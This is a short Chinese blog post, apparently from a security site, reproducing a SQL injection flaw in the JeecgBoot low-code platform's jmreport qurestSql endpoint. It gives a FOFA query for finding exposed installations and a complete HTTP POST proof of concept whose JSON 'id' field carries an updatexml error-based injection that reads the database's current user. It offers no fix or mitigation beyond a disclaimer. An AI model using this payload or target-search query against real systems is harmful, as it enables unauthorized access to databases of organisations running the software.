漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞

免责声明

本文章只用于技术交流,若使用本文章提供的技术信息进行非法操作,后果均由使用者本人负责。

漏洞描述

JeecgBoot 企业级低代码平台 qurestSql存在SQL注入漏洞。

图片[1]-漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞-安全小天地

漏洞复现

fofa-query: app=”JeecgBoot-企业级低代码平台”

1.执行poc,进行当前用户查询

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1\' or \'%1%\' like (updatexml(0x3a,concat(1,(select current_user)),1)) or \'%%\' like \'\"}

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞10 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容